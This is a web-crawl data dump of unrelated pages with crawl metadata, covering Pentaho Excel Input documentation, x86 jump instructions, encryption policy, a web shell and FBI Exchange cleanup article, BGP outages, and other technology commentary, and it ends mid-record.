You can use the Microsoft Excel Input step to read data from Microsoft Excel. The following sections describe each of the available features for configuring this step. The default spreadsheet type is set to Excel 97-2003 XLS. When you are reading other file types, such as OpenOffice ODS or Excel 2007, and using special functions like protected worksheets, you need to change the Spread sheet type (engine) in the Files tab accordingly. If you are using password protected worksheets, you must set Spread sheet type (engine) to Excel 2007 XLSX (Apache POI). Enter the following information in the transformation step name field: - Step name: Specifies the unique name of the Microsoft Excel Input transformation step on the canvas. You can customize the name or leave it as the default. You can use Preview rows to display the rows generated by this step. The Microsoft Excel Input step determines what rows to input based on the information you provide in the option tabs. This preview function helps you to decide if the information provided accurately models the rows you are trying to retrieve. The Microsoft Excel Input step features several tabs with fields. Each tab is described below. Use the Files tab to enter the following options to define the location of the Microsoft Excel source files: |Spread sheet type (engine)|| Select the spreadsheet type. The following types are supported: |File or directory||Specify the source location if the source is not defined in a field. Click Browse to navigate to your source file or directory. Click Add to include the source in the Selected Files table.| |Regular expression||Specify a regular expression to match filenames within a specified directory.| |Exclude regular expression||Specify a regular expression to exclude filenames within a specified directory.| |Password||Specify the password to open the Excel file when password protection is set.| |Accept filenames from previous steps||Select the previous step that contains file names and the input field for reading in your data.| Selected files table The Selected files table shows files or directories to use as source locations for input. This table is populated by specifying File or directory, then by clicking Add. The Microsoft Excel Input step tries to connect to the specified file or directory when you click Add to include it into the table. The table contains the following columns: |File/Directory||The source location indicated by clicking Add| |Wildcard (RegExp)||Wildcards as specified in Regular expression| |Exclude wildcard||Excluded wildcards as specified in Exclude regular expression| |Required||Required source location for input| |Include subfolders||Whether subfolders are included within the source location| Click Delete to remove a source from the table. Click Edit to remove a source from the table and return it back to the File or directory option. Use Show filename(s) to display the file names of the sources successfully connected to the Microsoft Excel Input step. Use the table in the Sheets tab to specify which worksheets and grid locations for reading data from the Microsoft Excel source files. The table contains the following columns: |Sheet name||The name of the sheet in the Excel workbook to read| |Start row||The starting row in the sheet to read. The row numbers are zero-based (start at the number 0).| |Start column||The starting column in the sheet to read. The column numbers are zero-based (start at the number 0).| You can also read all the sheets in a workbook by clearing the table and typing only the start row and column in the first row, which will be used for all sheets. To read all the sheets in a workbook, do not to specify any sheet name (leave Sheet name blank). For this case, the field structure of each sheet needs to be the same. Click Get sheetname(s) to fill out the table with all the sheets from your source specified by File or directory in the Files tab. Use Content tab to configure which data values to retrieve. The following options are available: |Header||Select if the sheets specified in the Sheets tab contain a header row to skip.| |No empty rows||Select if you do not want empty rows to appear in the output of this step.| |Stop on empty rows||Select to stop reading the current sheet of a file when a empty line is encountered.| |Limit||Specify a limit on the number of records generated from this step. Results are not limited when set to zero.| |Encoding||Specify which text file encoding to use. Leave this option blank to use the default system encoding. On first use, PDI searches your system for available encodings. To use Unicode, specify UTF-8 or UTF-16.| Error Handling tab The Error Handling tab allows you to configure the following properties: |Strict types?||Select to have PDI report data type errors while reading.| |Ignore errors?||Select if you want to ignore errors during parsing. These lines can be dumped to a separate file by specifying a path in Warnings file directory, Error files directory, and Failing line numbers files directory. Clear this option to have lines with errors appear as NULL values in the output of this step.| |Skip error lines?||Select to have PDI skip lines that contain errors.| |Warnings file directory||Specify the location of the directory where warnings are placed if they are generated. The name of the resulting file is <warning dir>/filename.<date_time>.<warning extension>.| |Error files directory||Specify the location of the directory where errors are placed if they occur. The name of the resulting file is <errorfile_dir>/filename.<date_time>.<errorfile_extension>.| |Failing line numbers files directory||Specify the location of the directory where parsing errors on a line are placed if they occur. The name of the resulting file is <errorline dir>/filename.<date_time>.<errorline extension>.| The Fields tab displays field definitions for extracting values from the Microsoft Excel spreadsheet. The table in this tab contain the following columns: |Name||Name of field that maps to the corresponding field in the Microsoft Excel Input stream| |Type||Data type of the input field| |Length||Length of the field| |Precision||Number of floating point digits for number-type fields| |Trim type||The trim method to apply to a string| |Repeat||The corresponding value from the last row repeated if a row is empty| |Format||An optional mask for converting the format of the original field. See Common Formats for information on common valid date and numeric formats you can use in this step.| |Currency||Currency symbol ($ or € for example)| |Decimal||A decimal point can be a "." (5,000.00 for example) or "," (5.000,00 for example)| |Group||A grouping can be a "," (10,000.00 for example) or "." (5.000,00 for example)| Click Get fields from header row to have the step populate the table with fields derived from the source file. All fields identified by this step will be added to the table. See Understanding PDI data types and field metadata to maximize the efficiency of your transformation and job results. Additional output fields tab The Additional output fields tab contains the following options to specify additional information about the file to process: |Full filename field||Specify the field that contains the full file name plus the extension.| |Sheetname field||Specify the field that contains the name of worksheet you want to use.| |Sheet row nr field||Specify the field that contains the current sheet row number you want to use.| |Row nr written field||Specify the field that contains the number of rows written.| |Short filename field||Specify the field that contains the filename without path information but with an extension.| |Extension field||Specify the field that contains the extension of the filename.| |Path field||Specify the field that contains the path in operating system format.| |Size field||Specify the field that contains the size of the data.| |Is hidden field||Specify the field indicating if the file is hidden or not (Boolean).| |Uri field||Specify the field that contains the URI.| |Root uri field||Specify the field that contains only the root part of the URI.| Metadata injection support You can use the metadata injection supported fields with the ETL metadata injection step to pass metadata to your transformation at runtime. The following option fields and values in the Microsoft Excel Input step support metadata injection: - File and Directory - Regular Expression - Exclude Regular Expression - Is file Required - Include subfolders - Spreadsheet type - Sheet name - Sheet start row - Sheet start col - Trim Type
<urn:uuid:88c1e215-5921-40f0-a82d-2404352c75db>
CC-MAIN-2022-40
https://help.hitachivantara.com/Documentation/Pentaho/9.3/Products/Microsoft_Excel_Input
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00068.warc.gz
en
0.712158
2,026
2.640625
3
(Redirected from X86-assembly/Instructions/je)Jump to navigation Jump to search |You are here:| - The jz instruction is a conditional jump that follows a test. - It jumps to the specified location if the Zero Flag (ZF) is set (1). - jz is commonly used to explicitly test for something being equal to zero whereas je is commonly found after a cmp instruction. jz location je location test eax, eax ; test if eax=0 jz short loc_402B13 ; if condition is met, jump to loc_402B13 dec ecx jz counter_is_now_zero cmp edx, 42 je short loc_402B13 ; if edx equals 42, jum to loc_402B13
<urn:uuid:00724e1a-ab09-449d-acae-9ca1ed6534b6>
CC-MAIN-2022-40
https://www.aldeid.com/wiki/X86-assembly/Instructions/je
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00068.warc.gz
en
0.657228
191
3.25
3
Predictive analytics is now a strong force in the business world. Still, there are issues that remain. With so much data going around, it's impossible to have enough data scientists trained to glean factual and actionable information out of the various statistics and raw code coming in. As Forbes noted, there's already a shortage of properly credentialed experts in the field, and the nature of business changes as the potential of data analytics shifts away from IT thanks to custom BI solutions. With this in mind, there's a greater demand for alternatives, and the democratization of data is one path, creating the possibility of a citizen data scientist. Data for the people Many see the advent of data democratization not as a complete replacement, but rather a complement to skilled data science with support from trained scientists. With greater advances in BI technology, there's more automation happening at the ground level in terms of data processing. Moreover, key points concerning the data can still be gleaned without necessarily training a person on all the aspects associated with it. Gil Press at Forbes noted that automated processing already has a place in many companies, helping data scientists overcome much menial labor overall. "One way to democratize data is through advanced data modeling." In order to give laymen analysts a greater degree of control and power over the data they receive, different processes are under way. One is the creation of advanced models by data scientists, which staffers can then use to better assess certain trends or behaviors. This form of forecasting benefits analysts because they can process information without requiring expertise to glean critical points. Moreover, business professionals don't need complete training just to understand how to make the data models work, and more experienced professionals can tweak the models to accurately reflect certain trends. Another process worth considering is creating data lakes. TechRepublic defines them as unstructured information sets analysts can assemble themselves for assessment. This solves the major problem of too much data: Rather than process every single data point, professionals can hand to scientists what they're actually looking for. This helps improve efficiency in many ways by allowing scientists to focus on what is most important to the business. Finally, companies don't even need analysts to gather the key data sets. All that's required is an understanding of the field a staffer in marketing or sales – to give examples – possesses, knowing what metrics are relevant. Such methods can help unburden data scientists and give firms more control over their information.
<urn:uuid:cc04aab2-2185-4b07-b959-c5c2d1927bdb>
CC-MAIN-2022-40
https://avianaglobal.com/democratization-a-new-direction-in-predictive-analytics/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00269.warc.gz
en
0.949587
492
2.578125
3
1969 will forever be known as the year humans walked on the moon. Gary Ross Dahl rocked the world again in 1975 with the introduction of the Pet Rock. And MTV celebrated the moon landing and popular culture – and changed the music world – when it launched in 1981. The world remembers 1989 as the year the Berlin Wall fell, opening the door to a unified Germany. It’s hard to forget 2008, the year the financial crisis hit. And 2015 was the year of the millennial, when this group surpassed baby boomers as the biggest U.S. generation. Each year has its defining moments and trends. And 2020 will be the Year of Encryption. Here’s why: Encryption is a key technology in protecting sensitive information such as social security numbers, government IDs and financial data. It is also an important part of personal data privacy – a key consumer and compliance concern. Given the importance of encryption it is also a subject of debate at the U.S. state and federal level and elsewhere in the world. The CCPA will help educate the public on consumer privacy, cybersecurity and encryption The nation’s most populous state kicked off 2020 with the 2020 California Consumer Privacy Act (CCPA). As of Jan. 1, 2020, California residents have greater control over their personal data. Under the CCPA, organizations are required to disclose what data they have about California residents who request that information. Companies must delete the information of California residents who ask them to do so. And Californians can forbid organizations from sharing their data with other entities. Residents of the Golden State also now have the right to bring action for statutory damages if their information is subject to a data breach. But, notably, they can do so only in cases in which their personal information is nonencrypted and nonredacted. That is likely to prompt more organizations to employ encryption technology. So is the fact that the CCPA will make consumers more informed about personal data privacy. Renewed federal efforts will drive debate around encryption, putting it in the spotlight Lawmakers in the U.S. and elsewhere are also fueling discussion and new action around encryption. In Washington, D.C., there’s a new push to require the tech community to create encryption backdoors allowing government entities access to the information. Senators are pushing tech companies to give law enforcement personnel access to encrypted data for investigations into criminal and terrorist organization. The challenge with any “backdoor” is that there is the possibility a nefarious organization can also discover and utilize the backdoor for access to sensitive information — undermining the purpose of encryption. Meanwhile, government leaders from Australia, the U.K. and U.S. are urging Facebook to abandon encryption plans. They sent Mark Zuckerberg an open letter in October voicing their concerns and making this request. GDPR will keep the conversation going, too, with Brexit adding new fuel to the fire Then there’s the General Data Protection Regulation (GDPR). GDPR has been around for several months now. But many organizations are still implementing and fine-turning their compliance strategies around this relatively new requirement. And some strategies leverage encryption. Also, the significant GDPR fines regulators are levying for non-compliance continue to generate headlines and calls for better solutions. The fact that Brexit appears to be moving forward is also creating new conversations around GDPR. Businesses are wondering how the U.K.’s withdrawal from the European Union will impact GDPR requirements in the UK and how to respond. Encryption could help address concerns about the elections Four years have passed since the Cambridge Analytica-Facebook scandal and other election meddling activities came to light. Yet concerns remain about how the country can ensure fair elections in 2020 and beyond. Following the 2016 election, WIRED magazine ran a story with this headline: “For the Next Election, Don’t Recount the Vote. Encrypt It.” And, a couple of months ago, the Massachusetts Institute of Technology debuted a cryptographic voting system. Whether and when government leaders decide to employ encryption remains to be seen. (If they plan to use it for the elections, they better move fast, as primaries begin next month.) In any case, one thing seems certain: encryption in 2020 will be more readily understood, discussed and debated than ever before. And that’s a good thing. Welcome to the Year of Encryption.
<urn:uuid:77bd90be-0308-41b4-8781-5b0b8aeca36c>
CC-MAIN-2022-40
https://www.entrust.com/blog/2020/01/the-year-of-encryption-is-upon-us/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00269.warc.gz
en
0.931686
905
2.53125
3
Python can be used for everything from web development to software development and data science applications. The Python 3 course is a great introduction to the Python programming language as well as fundamental programming concepts. Python has grown exponentially in popularity as it is a versatile, general purpose programming language that is concise and easy to read, a good language to have in any programmer’s stack. Python 3 is the most up-to-date version of the language with many improvements made to increase the efficiency and simplicity of the Python code that you write. Below is a breakdown of the key areas of the Python 3 course: Get Started: Get started with Python syntax in this lesson and then create a point-of-sale system for a furniture store! Control Flow: Learn how to build control flow into your python code by including if, else, and elif statements. Expect to learn all you need to know about boolean variables and logical operators. Lists: Learn about lists, a data structure in Python used to store ordered groups of data. Loops: Loops are structures that let you repeat Python code over and over. Learn how to read loops and write them to solve your own problems. Functions: Learn about code reuse with Python functions. Apply that knowledge to create functions for famous physics formulas. Python Code Challenge: Code challenge to test your Python knowledge! Strings: Learn all about the Python string object. Figure out how to automatically create, rearrange, reassign, disassemble, and reassemble blocks of text! Modules: Learn how modules work in the Python programming language. Dictionaries: Learn all about the Python dictionary structure and how to create and use key-value pairs in your code. Files: Learn how to work with files in an automated way! Investigate the properties of text, CSV, and JSON files by reading and writing to them! Classes: Learn about the differences between data types in Python and how to create your own classes, objects, and interfaces. Python Code Challenge 2: Code challenge to test your Python knowledge!
<urn:uuid:692c2dcf-9a0c-4a31-aed4-effab56ff69f>
CC-MAIN-2022-40
https://www.itonlinelearning.com/data-analyst-career-programme/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00269.warc.gz
en
0.890606
428
3.5625
4
There’s a number of studies that show how easily things like social media and Candy Crush can ruin your life. On one hand, there are rare and extreme cases were this has actually happened. On the other hand, let’s ask ourselves what good technology can do for us, our mental health, and our society. It’s easier to focus on the bad than the good. As helpful as technology can be, it can cause negative side effects if you’re not careful. Most common problems come from eye and neck strain. Here are a few tips on what you can do to avoid them: Let’s get physical, physical, as they used to say. It’s easy to get lost in your newsfeed for what seems like hours. Being inactive for too long can cause health problems, such as back problems and muscle degeneration. Doctors suggest stretching every 30-40 minutes. Walk to the other room, stretch your arms, roll your shoulders, and get your blood pumping again. Protect Your Eyes Long exposure to smartphones, screens, or TVs can cause major eye strain from the blue light the screens emit. How does this light affect your eyes? Blue light is the shortest wavelengths in the color spectrum, but it carries the highest amount of energy. Due to this, long exposure to blue light waves causes eye strain. A lot of devices now have the ability to dim the amount of blue light emitted. Another way to diminish your exposure to blue light is to use screen filters. Like this blue light blocking screen panel from Amazon that simply slips onto your monitor. Another way you can block blue light is with a pair of fashionable, yet techy, glasses designed to block blue light which you can find here on Amazon as well. There’s many concerns that technology is causing negative impacts on children, teenagers, and young adults growing up in today’s tech-rich environments. However, with proper use and parental guidance, technology can have a positive impact on the lives of children. Children now use technology more than ever in the classroom and the results are in. According to this survey from the University of Phoenix, 63% of teachers K-12 use tech in the classroom in 2018. Integrating technology into education has helped teachers and students achieve more in the classroom and develop critical skills for the future. Major companies such as Microsoft and Google offer education-focused software that allows teachers to review a student’s progress with analytics and engage with students on an individual basis. Getting More Done Cloud-based apps such as Socrative allow students to answer pop quizzes quickly through their laptops or smartphones. Instead of spending up to 20 hours a week grading papers, these cloud based solutions allow teachers to spend more quality time on lessons and one-on-one time with students. Another great app for teachers is Bloomz. It allows teachers to easily network and build relationships with their student’s parents. This new level of connectivity between student, teacher, and parent is only possible due to innovations within the tech field. Involving a child’s parents is another fail-safe to ensuring their success in school and in life. With the rise of online shopping and e-Commerce, small businesses are clutching their pearls. The transition to online platforms for buying and selling has helped businesses thrive more than they could with a brick and mortar shop alone. Instead of offering products and services to a local community, business owners are expanding to locations far outside their area code. For businesses that don’t see profit from goods and focus more on the service side, technology is also playing a huge role in getting more people through the door. Companies are able to better advertise their solutions with online marketing services, such as social media and Google Ads. More Clients, More Profit With the rise of online shopping and e-Commerce, small businesses are clutching their pearls. The transition to online platforms for buying and selling has helped businesses thrive more than they could with a brick and mortar shop alone. Instead of offering products and services to a local community, business owners are expanding to locations far outside their area code. For businesses that don’t see profit from goods and focus more on the service side, technology is also playing a huge role in getting more people through the door. Companies are able to better advertise their solutions with online marketing services, such as social media and Google Ads. Having a strong presence on the web is essential for any business, big or small. It allows new potential clients to learn more about your business and become more educated about your offerings before making a decision. Being able to connect with customers and clients in real time with e-mail solutions has also allowed businesses to build stronger relationships with their partners. Their profit margins speak for themselves. For businesses who don’t use a private e-mail service, you should look into making the switch to a stronger and secure e-mail provider, such as Kustura Technologies. We offer e-mail security and privacy that you won’t see with Gmail or Yahoo. Having a custom domain (your_name@your_business.com) can also help boost client confidence in you and your businesses, too. Good or Evil? When we think about technology, it’s neither good or evil. It’s how we use it that determines its impact on our lives. Disconnecting and going off the grid is definitely an option for those who don’t like this new age of smart-everything including notebooks, light bulbs, and soon everything under the sun will have a smart version of it (check out our top list of gadgets to see what we mean). While technology can have its downsides, the positive impact its had on our lives as a society outweigh the bad by far. Let us know in your comments how you feel about technology, is it helping or hurting us?
<urn:uuid:5a0dff85-a2a8-4d36-83cc-5fdb31d2e12b>
CC-MAIN-2022-40
https://www.kustura.com/is-technology-improving-or-hurting-our-lives/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00269.warc.gz
en
0.956855
1,223
2.921875
3
Too often the design of new data architectures is based on old principles: they are still very data-store-centric. They consist of many physical data stores in which data is stored repeatedly and redundantly. Over time, new types of data stores, such as data lakes, data hubs, and data lake houses, have been introduced, but these are still data stores into which data must be copied. In fact, when data lakes are added to a data architecture, it’s quite common to introduce not one data store, but a whole set of them, called zones or tiers. Having numerous data stores also implies that many programs need to be developed, maintained, and managed to copy data between the data stores. Modern Forms of Data Usage Organizations want to do more with data and support new forms of data usage, from the most straightforward ones to the most complex and demanding ones. These new, more demanding use cases are driven by initiatives described by such phrases as “becoming data-driven” and “digital transformation.” Most organizations have evaluated their current ICT systems and have found them unable to adequately support these new forms of data usage. Conclusion: a new data architecture is required. Legacy Design Principles will not Suffice As indicated, the inclination is still to develop data processing infrastructures that are based on a data architecture that is centered around data stores and copying data. This repeated copying and storing of data reminds me of designing systems in the mainframe era. In these legacy architectures, data was also copied and transformed step-by-step in a batch-like manner. Shouldn’t the goal be to minimize data stores, data redundancy, and data copying processes? Data-store-centric thinking exhibits many problems. First, the more often data is physically copied before it’s available for consumption, the higher the data latency. Second, with each copying process, a potential data quality problem may be introduced. Third, physical databases can be time-consuming to change resulting in inflexible data architectures. Fourth, from a GDPR perspective, it may not be convenient to store, for example, customer data in several databases. Fifth, such architectures are not very transparent, leading to report results that are less trusted by business users. And so on. New data architectures should be designed to be flexible, extensible, easy to change, and scalable, and they should offer a low data latency (to some business users) with high data quality, deliver highly trusted reporting results, and enable easy enforcement of GDPR and comparable regulations. Agile Architecture for Today’s Data Usage During the design of any new data architecture, the focus should be less on storing data (repeatedly) and more on the processing and using of the data. If we are designing a new data architecture, then deploy virtual solutions where possible. Data virtualization enables data to be processed with less need to store the processed data before it can be consumed by business users. Some IT specialists might be worried about the performance of a virtual solution, but if we look at the performance of some newer database servers, that worry is unnecessary. Most organizations need new data architectures to support the fast growing demands for data usage. Don’t design a data architecture based on old architectural principles. Don’t make it data-store-centric. Focus on the flexibility of the architecture. Prefer a virtual solution over a physical one. This will enable ICT systems to keep up with the speed of business more easily while providing better, faster support for new forms of data usage. - The Data Lakehouse: Blending Data Warehouses and Data Lakes - April 21, 2022 - Use the Cloud More Creatively - January 28, 2022 - Data Minimization as Design Guideline for New Data Architectures - May 6, 2021
<urn:uuid:3b44978c-58c3-4f40-ae82-9a1345520c6c>
CC-MAIN-2022-40
https://www.datavirtualizationblog.com/new-data-architectures-are-too-data-store-centric/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00469.warc.gz
en
0.931047
788
2.9375
3
On November 5th, 2012 at roughly 6pm PST, Google’s services went offline. A lot of companies rely on their Gmail, Gdocs and Gdrives to exchange work-related content. Not having access to these services are a big deal, but, understanding some of the pitfalls of the internet may explain how this can happen to Google. We’ll keep it simple; the internet is held together by a collection of networks known as “Autonomous Systems” (AS), with every network having it’s own AS number. That being said, AS numbers (or networks) are connected by a patching system entitled “Border Gateway Protocol”. The BGP, as it is known, tells which IP address belong to what network and routes AS numbers accordingly. Routes are pathways from one IP to another. AS simply establishes the connection. That’s cool, but still, the question remains: why does this stuff matter? BGP relies heavily on trust. In other words, If one company says they are behind a specific IP address no one questions it. They are simply routed across a specific pathway on the network. The trouble starts when particular IPs state they are behind a given address when they really are not. Sometimes it’s a malicious act and other times it’s not. In Google’s case, information behind IP routes were misrouted or “leaked”, or simply not announced correctly by the BGP system. Still with me? Okay, here we go: Sometimes, malicious reasons or not, IP address can be “leaked” outside their normal paths. More likely it was probably an honest mistake and a lesson learned that failings of the BGP system do tend to happen from time to time. So what’s the solution? Most network engineers have established relationships with each each other, therefore they can communicate with each other when route leakage occurs. Chances are, once a network becomes un-responsive, an engineer is on the phone to notify identified networks to stop announcing routes they don’t actually represent. As soon as that happens, the BGP can successfully route IP address to the correct place. Although this may all seem moot, an update from google stated it was simple a hardware failure. Go figure, but route leakage does and will happen again. The internet’s a wild place isn’t it? For more information contact James Mulvey
<urn:uuid:a93d3456-9f39-4f7a-a6da-d60a4c033933>
CC-MAIN-2022-40
https://www.colocationamerica.com/blog/how-the-internet-works-getting-knocked-offline-sucks
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00469.warc.gz
en
0.961066
512
2.609375
3
Microsoft has recently seen many attacks by hackers using so-called web shells. The number of web shell attacks between August 2020 and January 2021 doubled compared to the same period a year earlier. But what are they exactly and how can you fight them? Microsoft recorded a total of 144,000 web shell attacks between August 2020 and January 2021. Web shells are very light programmes (scripts) that hackers install to either attack affected websites or web-facing services or prepare a future attack. A web shell allows hackers to execute standard commands on web servers that have been compromised. Web shells use code such as PHP, JSP or ASP for this purpose. When the web shells are successfully installed, the hackers are able to execute the same commands as the administrators of the website can. They can also execute commands that steal data, install malicious code and provide system information that allows hackers to penetrate deeper into networks. Web shells are also a permanent form of a 'backdoor' that continues to affect compromised servers. They are notoriously difficult to discover, partly because they have different ways of executing commands. Hackers also hide these commands in user agent strings and parameters that are exchanged between attackers and the attacked websites. Furthermore, web shells can be piled up in media files or other non-executable file formats. To find out if web shells are present on a server there are some indicators which might help you: unknown connections in the logs of the server, abnormal high server usage, files with an abnormal timestamp and a lot of other indications. But even with these indicators it remains very difficult to discover them. To combat attacks using web shells, there are a number of possible solutions. These include discovering these programs by identifying and resolving vulnerabilities and misconfigurations in web applications and web servers through the use of threat and vulnerability management. In addition, attacks can be prevented by proper segmentation of the perimeter network, so that attacked web servers do not cause further damage in networks. Furthermore, companies must always install antivirus protection on the servers as this can prevent the malware from being installed on the machines. We have already been made aware of cases where only email protection was in place on these servers. Those of course offer no protection against malware on the actual server or against certain types of targeted attacks. Furthermore, companies should audit and view the logs of their web servers more frequently. This will give them more awareness of which systems might be exposed to the Internet. During the Hafnium attack and recent other MS Exchange attacks among other things, web shells were used to install ransomware on the compromised servers and to steal data. Now suddenly the FBI took some action by itself. A couple of weeks ago, the American investigation service announced that it had removed web shells from hundreds of compromised servers via a court order. The removed web shells belonged to a group that took advantage of Exchange vulnerabilities at an early stage to gain access to the networks of US organizations and companies. These web shells each had a unique path and file name, making it potentially more difficult for the server owners to find and remove them. In this initiative, spearheaded by the FBI, hundreds of Microsoft Exchange servers infected with malware in the United States were cleaned up. However, the fact that affected organizations were only made aware of this after the fact, has garnered mixed reactions from security experts and security companies. "The FBI is breaking into American computers to remove malware - and is breaking the law to do so," said whistleblower Edward Snowden. Experts told SecurityWeek that the action sets a dangerous precedent of giving law enforcement agencies broad permission to break into computers suspected of being compromised. However, there are also experts who agree with the FBI's action, as it protects companies with possibly no good technical background. A security researcher with the alias The Grugq states in a reaction that the infected Exchange servers that have been cleaned up will probably be compromised again. There are also legal questions about the method being used. "This warrant is a very powerful and potentially dangerous tool that gives the government permission to access the computers of innocent people to delete files without notice," says Kurt Opsahl of the US civil rights movement EFF told The Washington Post. While there are a lot of doubts if this action was ethically reasonable in this case, the good news is that the FBI at least is informing all owners and administrators of the servers from which it has removed the web shells. If the contact details are public, the US investigation service sent an e-mail. If the contact details are not known, the FBI informed the provider of the owner concerned, who in turn alerted the infected and cleaned-up client. The question remains if an action like this would have been possible in the EU. Of course although the web shells have been successfully removed, the underlying vulnerabilities in the Exchange server have not been patched. It is also possible that other malware is still present on the system. Companies should definitely double check their servers for malware. The fact that the FBI has removed one particular thing from compromised system does not constitute a clean bill of health for the machine in question. The affair leaves one uncomfortable question lingering, which goes back to Mr Opsahl’s statement: If law enforcement is allowed to step in and make changes to a system, doesn’t this leave open a lot of potentially undesirable options? Could this be a precedent to issuing carte blanche to any and all investigators to just go and gather supposed evidence in a “no holds barred” way, even if no crime has been committed? Or worse, surreptitiously plant evidence there? This is a dangerous path to go down. There is lots of potential for irreparable damage, not only to the data that companies handle and that they were entrusted with, but also the trust of people in the authorities, which in some areas is not great to begin with. This move forward could not have come at a worse time. Germany, always a stalwart defender of privacy, has just greenlit a new piece of national law that would force providers to assist law enforcement in planting surveillance software on a suspect’s devices, even if no crime may have been committed (yet). All opposition and well-founded criticism was shot down, drafts were submitted with only days to examine and provide feedback. This will no doubt have a signaling effect.
<urn:uuid:ac8d43c8-dc0b-4ae4-b18b-c07df742c8d2>
CC-MAIN-2022-40
https://www.gdatasoftware.com/blog/webshells
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00469.warc.gz
en
0.964303
1,278
2.890625
3
These days, you can find WiFi hotspots almost anywhere. Universities, libraries, hotels, airports, and many more service providers make WiFi hotspots available in their spaces for customer convenience. A lot of people use and enjoy this service without confirming and authenticating its safety. The problem with these networks in public places is that they’re hardly secure as such hotspot providers hardly pay attention to public WiFi security. When you are connected to such networks, and you send information to apps and websites, cybercriminals can remotely have access to such information quite easily. But there are ways to use public WiFi safely. Why public WiFi security is so important If you log into an unencrypted website via an unsecured network, others connected to the same network can be able to gain access to your information thatwhat you view or send. They can be able to sign in like you in your accounts and cause damage. Your sensitive documents, credit card details, private photos, and contacts can be stolen by cybercriminals. They maycan be able to hack other websites related to you, steal your money, borrow money from loan apps or even impersonate you to scam family and friends in your contact list. They can steal your identity and cause unimaginable damage. Another reason you should secure your information while on public WiFi hotspots is to prevent the hotspot provider from gaining unsanctioned access to your information and internet traffic, whether at hotels, schools, airports, and other public places. Is public WiFi safe? Public WiFi networks can be safe when you use them with caution. It may seem scary, but some solutions can help you use public WiFi securely. Since you can do very little to guarantee that public WiFi hotspots are safe, these are steps to take to make sure you use public WiFi safely. - Connect only with secure sites. This means you should only connect to websites with HTTPS in their addresses. However, using an HTTP site does not mean the website is authentic. Cybercriminals also know how to encrypt websites and make them look legit. So though your data cannot be accessed by criminals using the same public hotspot as you, it could be en route to hackers if you are hopping onto a scam website. - Use a VPN (a virtual private network). Virtual private networks help you encrypt your data in such a way that hackers won’t be able to crack or gain access to it. This is arguably the best way to stay safe on public WiFi networks. VPNs can be free or paid, and it is advisable you go for paid VPNs as the free types are often created for suspicious purposes like data theft. - Make use of your phone’s mobile data. Since your phone’s data is usually encrypted, you should make use of it when in public spaces, especially when you are going to be typing and sending your personal or financial details to apps or websites. Your mobile data is always a more secure option since we can’t be sure if public WiFi hotspots are secure. Other than the above-mentioned steps, there are many other ways one can protect oneself and data from cyberbullying. Below are some of these steps: - Don’t access personal or financial information over public networks. - Log out immediately if you accidentally find yourself on an unencrypted website. - Log out each time you are done using an account. - To prevent hackers who gain access to one of your accounts from breaking into your other accounts, use distinct passwords for each of your accounts. - Many browsers such as chrome will give you a warning when you are about to get into insecure sites or download malicious files. Pay attention to these. - Ensure you always keep your browser and anti-malware software up to date. - Change your settings to avoid automatically logging into public WiFi. Whether we want to continue working while having a lunch break from work or we need to do a little online research in the school library, public hotspots provide us with much-needed convenience. What matters is that we take public WiFi security seriously to avoid privacy invasion and identity theft.
<urn:uuid:1699c028-a423-4e44-8173-b746b98ea3ba>
CC-MAIN-2022-40
https://hackingvision.com/2022/02/24/use-public-wifi-safely-remain-vigilant-online/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00469.warc.gz
en
0.938667
844
2.53125
3
Lean Yellow Belt explores the concepts of lean, basic tools and techniques, and the integration of lean culture, rapid process improvement, lean metrics and ideas for sustaining lean within any organization. Lean Yellow Belt consists of a variety of methods used by the lean team to improve a process. These methods include 5S, Value Stream Mapping, and Kaizen to name a few. The Lean Yellow Belt is 3 days in duration due to the number of methodologies that are discussed. The Lean Six Sigma Yellow Belt is a 1-day course that speaks to Waste, Lean and Six Sigma definitions. The Six Sigma DMAIC (Define, Measure, Analyze, Improve, Control) methodology is taught and utilized to teach problem solving. Neither of these courses require a math background, although basis algebra is used in some of the sessions.
<urn:uuid:0490d48b-9cc6-4ec8-9fff-4d1c49bca471>
CC-MAIN-2022-40
https://www.learningtree.ca/courses/lean-yellow-belt/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00469.warc.gz
en
0.936621
166
2.78125
3
Today, the US Library of Congress announced that it acquired the entire Twitter public archive going back to March 2006. At over 50,000 tweets per day, that accounts for billions of tweets. The announcement creates a number of considerations. The first cements the concept that social media posts are forever. This is not new…is it? The Library of Congress is a one-way vault of collecting information amongst other things. As such, it may cause one to rethink their posts before hitting the return key. The second thought is a change to the way information is organized. Today, many think in terms of centralizing data as much as possible. But with the increase in both sources and end points, the strategy is flawed. Rather than collecting information into a central source, we need a way to connect the different data sources. This does a couple of things. First, it eliminates the need to duplicate data to multiple locations. Second, it prevents the need to make assumptions on the organization of data. Put another way, data organization becomes more abstract and dynamic. Third, mobile devices are used more than ever to access data. The physical location and connectivity method of those devices varies from device-to-device and day-to-day. In essence, a new architecture is needed to create dynamic organization of data. This also requires a more robust global network to bring data from different sources dynamically.
<urn:uuid:b19c3741-ef21-4254-b41b-1f1c7af9c3f8>
CC-MAIN-2022-40
https://avoa.com/2010/04/14/a-tweet-is-forever/
null
